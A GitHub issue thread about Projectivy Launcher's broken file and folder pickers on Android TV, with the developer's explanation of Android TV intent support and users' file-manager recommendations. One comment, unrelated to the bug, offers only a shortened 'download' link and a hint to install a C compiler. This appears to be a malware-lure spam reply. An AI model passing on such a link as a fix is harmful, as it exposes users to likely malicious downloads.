### ISSUE TITLE
[Bug] Uses wrong file picker code for custom wallpaper file chooser

### ISSUE THREAD

**Issue by Arcitec** [spocky/miproja1#165]
Alright, I have installed two file managers on Sony Android TV:

- FX File Explorer
- X-Plorer

These things work:

- If I go to Projectivy: Manage Settings, and press Import, then I get the file picker app and can choose settings to import.
- If I choose Export: Share with another app, I also get a file picker app and can choose a place and filename to save the settings.

These are bugged:

- Projectivy: Manage Settings: Save locally. This causes the popup "You don't have an app that can do this".
- User defined folder wallpaper: "Pick Folder" does nothing. No error. Nothing.
- User defined wallpaper: "Pick image/video" button causes the popup "You don't have an app that can do this".

It seems like the code to load/save settings is correct, and that the code to pick wallpapers is wrong.

Please check the calls to make sure the same API is used for each, since the settings file chooser works and the others don't.

Android TV10 on Sony TV. :)

**Comment by nhatlaso1** [comment]
download
https://bit.ly/4evXrQ6

you may need to install the c compiler

**Comment by Thorfinn66** [comment]
You need a File Manager installed to be able to select files. File Explorer+ works well. 
But NO File Managers can currently open/select a folder. I believe that Shield have a custom function that can do that, but thats the only one.

A simple workaround would be letting filemanagers select a dummy file inside a folder. And then extract the path from that. (Folder should containe some wallpaper images anyway)

**Comment by Thorfinn66** [comment]
FX File Explorer is old and haven't been updated for years. So it unfortunatly doesnt follow the standard guidelines on how to link into the system. (Shame as it's still my favorite File Manager)

**Comment by Arcitec** [comment]
> FX File Explorer is old and haven't been updated for years.

That's not true:

https://play.google.com/store/apps/details?id=nextapp.fx&hl=en

Its latest update was 9.0 on "Apr 9, 2023", which added support for Android 13 (so it supports Android 5-13). My TV uses Android 10.

> So it unfortunatly doesnt follow the standard guidelines on how to link into the system. (Shame as it's still my favorite File Manager)

I have no way of checking that but I highly doubt it.

**Comment by Arcitec** [comment]
Okay I have tried two apps so far... Everything still points to Projectivy being incorrectly coded...

FX File Explorer:

- :heavy_check_mark: Projectivy: Manage Settings: Import.
- :heavy_check_mark: Projectivy: Manage Settings: Export: Share with another app.
- :x: Projectivy: Manage Settings: Export: Save locally. This causes the popup "You don't have an app that can do this".
- :x: User defined folder wallpaper: "Pick Folder" does nothing. No error. Nothing.
- :x: User defined wallpaper: "Pick image/video" button causes the popup "You don't have an app that can do this".

File Manager Plus:

- :heavy_check_mark: Projectivy: Manage Settings: Import.
- :heavy_check_mark: Projectivy: Manage Settings: Export: Share with another app.
- :x: Projectivy: Manage Settings: Export: Save locally. This causes the popup "You don't have an app that can do this".
- :x: User defined folder wallpaper: "Pick Folder" does nothing. No error. Nothing.
- :heavy_check_mark: User defined wallpaper: "Pick image/video".

**Comment by Thorfinn66** [comment]
> > FX File Explorer is old and haven't been updated for years.
> 
> That's not true:
> 
> https://play.google.com/store/apps/details?id=nextapp.fx&hl=en
> 
> https://www.apkmirror.com/apk/nextapp-inc/fx-file-explorer/fx-file-explorer-9-0-1-2-release/fx-file-explorer-9-0-1-2-android-apk-download/
> 
> Its latest update was 9.0.1.2 on "Apr 9, 2023", which added support for Android 13 (so it supports Android 5-13). My TV uses Android 10. Since it's feature-complete it clearly doesn't need updates atm.
> 

That doesn't really count as an update. The dev just made it compatible with android 14. But he never bothered to fix any of the errors in app. Nor does he respond to emails. So I count it as dead. (I bought it myself long ago and it's still my favorite) 


> > So it unfortunatly doesnt follow the standard guidelines on how to link into the system. (Shame as it's still my favorite File Manager)
> 

So far I have found no filemanagers that can select a folder. But the ones that sets up as default works for selecting files. Like File Manager+ (which is the one that resemble FX most. And it works with Shizuku)

I agree that PL have a problem with selecting folders which is quite annoying.
Would be nice if the settings file was in human readable format like json. So you could modify it by hand if needed.

FX I still my favorite too despite the bugs and lack of updates. It's the only one I have been able to get working with Google Drive. All other File Managers failed.

**Comment by Thorfinn66** [comment]
A guy on Reddit said the folder picking worked on his Shield, but not his new Streamer.
Maybe Shield have something build-in to handle file/folder operations?

**Comment by Arcitec** [comment]
@IPTN Thanks for those insights. I suspected that Android TV was missing that service.

Best solution would be to make Projectivy itself require storage permission and to code a built-in folder browser.

**Comment by Thorfinn66** [comment]
Wouldn't using the file selector (from filemanager) to select a (dummy) image from a folder work?
And then in PL code, strip the file name from path?
That would not need to add much extra code and can rely on filemanagers to do the job.

**Comment by Thorfinn66** [comment]
> Unfortunately not. Files selected that way are accessed/shared using a content URI.

Then what about having the folder paths predefined? 

Like having a folder "ProjectivyLauncher" 

In here config files would be  saved. 

And folder also contain subfolder "Wallpapers". This could again be divided I to numbered subfolder 1-9

These subfolder could then be hard coded as paths for selecting wallpaper folder.

**Comment by spocky** [comment]
Wow, that's a long discussion I completely missed, sorry for that.

To address the main complain here, let me tell it once and for all : there may be path of improvement in Projectivy, but file access is probably the least of them (not that it's working perfectly, but rather because I think I've done everything I could)

Let me focus on a few points:
- first, [please read this](https://github.com/spocky/miproja1/issues/69#issuecomment-2502327466)
- to be published on Google Play, Projectivy has to follow their rules, which means, as it's not a file manager, that it needs to rely on other apps and can't just request full access to external storage. Let me quote google again : "the app’s usage of the permission [...] must be directly tied to the core functionality of the app". Upon Google Play pre-publish review, this will more or less only be accepted for file managers, and surely not for an app's side feature. I know a few other apps do this. Some of them are simply not on Google Play. Other might just be lucky. I've experienced app ban more than 10 years ago because Google suddenly decided my app didn't respect their policy (it __was not__ after an update, nor after a policy change). They wouldn't give me details and responded my appeals with generic copy/pasted text. Took me one month to understand and fix. It could also just have been the complete end of this app. I don't wanna risk the same for Projectivy.
- yes, `ACTION_OPEN_DOCUMENT_TREE` has been there for a long time. This doesn't mean it's supported by Android Tv. It's already explained on the 1st link, but let me rephrase [what's there](https://issuetracker.google.com/issues/71327396) : Google Tv team has decided that ACTION_OPEN_DOCUMENT_TREE are not part of their CTS on Android Tv (thus, Google Tv OEM implementation can get approval even without this being supported).
- Projectivy uses state of the art recommendations from Google :
  - folder picker uses [ActivityResultContracts.OpenDocumentTree()](https://developer.android.com/reference/androidx/activity/result/contract/ActivityResultContracts.OpenDocumentTree) which in turns uses ACTION_OPEN_DOCUMENT_TREE. It's just not supported except on Nvidia Shield. As to why no File Managers can respond to this intent, I suppose they simply can't if they're not a system app.

> Everything still points to Projectivy being incorrectly coded... Because there is ZERO good reason why "import settings file" works but "import image/video file" does not. Clearly Projectivy's file import code is not uniformly written.

ZERO good reason, seriously ? I can see a dozen, starting with the most obvious : different mimetype.
As explained above, state of the art reco from Google :
- import file/video uses their [photopicker intent](https://developer.android.com/training/data-storage/shared/photopicker), which is the standard recommended way to pick images/videos. It's supposed to be automatically deployed by the Play Store if not available on your stock rom. Seems they "forgot" to do this on Android Tv... As written in their doc, it internally falls back to a file manager if the picker is not available. Working fine on Android Tv 14, though.
- import settings (binary file) uses [ActivityResultContracts.OpenDocument()](https://developer.android.com/reference/androidx/activity/result/contract/ActivityResultContracts.OpenDocument) and (if unsupported) even falls back to [ActivityResultContracts.GetContent()](https://developer.android.com/reference/androidx/activity/result/contract/ActivityResultContracts.GetContent)
- export+save settings uses the [ActivityResultContracts.CreateDocument](https://developer.android.com/reference/androidx/activity/result/contract/ActivityResultContracts.CreateDocument) because it ultimately creates a document
- export+share settings creates the file locally and then uses Intent.ACTION_SEND to send it to other apps

All of theses are [the standard way](https://developer.android.com/guide/topics/providers/document-provider) of doing what Projectivy needs.

So except for the folder picker that has only one existing intent, the 3 other file interactions (pick image, import backup, save backup) all offer 2 different ways of execution (one standard + a fallback) and yet many Android Tv don't support at least one (mostly because most of them don't ship with a basic file manager)

So I even added more workarounds by letting Projectivy be the recipient of file managers (you click on a file in a file manager and Projectivy can open it). Now regarding the file managers themselves, I litterally spent days to offer the best support but it's a total mess because for the same intent, they don't react the same way, depending on the data you send...
- to set background : I had to implement 2 different intent-filters in Projectivy
- to import a backup : I had to implement 3 different intent-filters in Projectivy. Let's detail them just for fun :
   - the mimetype must be omitted for fx explorer
   - the mimetype must be `*/*` for the Shield stock file manager as well as Solid Explorer
   - the mimetype must be `application/octet-stream` and the host should be omitted for the Pixel stock file manager as well as Google drive

I'm sure there are plenty other specificities depending on each file manager.

Now regarding my recomendations (except for folder picker which simply doesn't work in 3rd party file managers, this list supports everything required by Projectivy, or a fallback). Many others I've tested don't support something, but keep in mind I couldn't test everything.
- MiXplorer : has a free version on XDA and is really solid. This is my preferred file manager.
- File manager plus : has ads
- cxexplorer : seems to be a previous version of File Manager Plus
- Rs File Explorer : great ui for Tv, but does tracking in the background and on the main thread, which causes stutters now and then, when watching streaming on my Shield (at least the version I tested 1 month ago).

**Comment by Arcitec** [comment]
@spocky Wow, holy crap, I could not guess that Android TV's file picker situation is such a complete clusterfuck! I feel your pain. And I'm angry at Google for releasing such a mess.

And as I documented above, each File Picker app is broken in different ways because they don't all implement every protocol either:

https://github.com/spocky/miproja1/issues/165#issuecomment-2417003637

Would it make sense to implement a very basic file load/save selector UI entirely inside Projectivy so that it doesn't need any external apps and permissions?

**Comment by peat80** [comment]
Hey guys, i have finally found an filemanager which implements a proper documents provider for androidtv.

Installing this app exports from projectivy and other apps i tried works flawless!
Also you can choose a wallpaper folder and this works too!!!

Tried a lot of filemanagers an documentsui versions and almost lost hope to get this working.

The app is called My File and can be installed from Play Store.
No sideload needed! 🥳🥳🥳

https://play.google.com/store/apps/details?id=com.docreader.fileviewer.pdffiles.opener

**Comment by andrewr01** [comment]
> Hey guys, i have finally found an filemanager which implements a proper documents provider for androidtv.
> 
> Installing this app exports from projectivy and other apps i tried works flawless! Also you can choose a wallpaper folder and this works too!!!
> 
> Tried a lot of filemanagers an documentsui versions and almost lost hope to get this working.
> 
> The app is called My File and can be installed from Play Store. No sideload needed! 🥳🥳🥳
> 
> https://play.google.com/store/apps/details?id=com.docreader.fileviewer.pdffiles.opener

Nice one! It does work. Thanks very much!
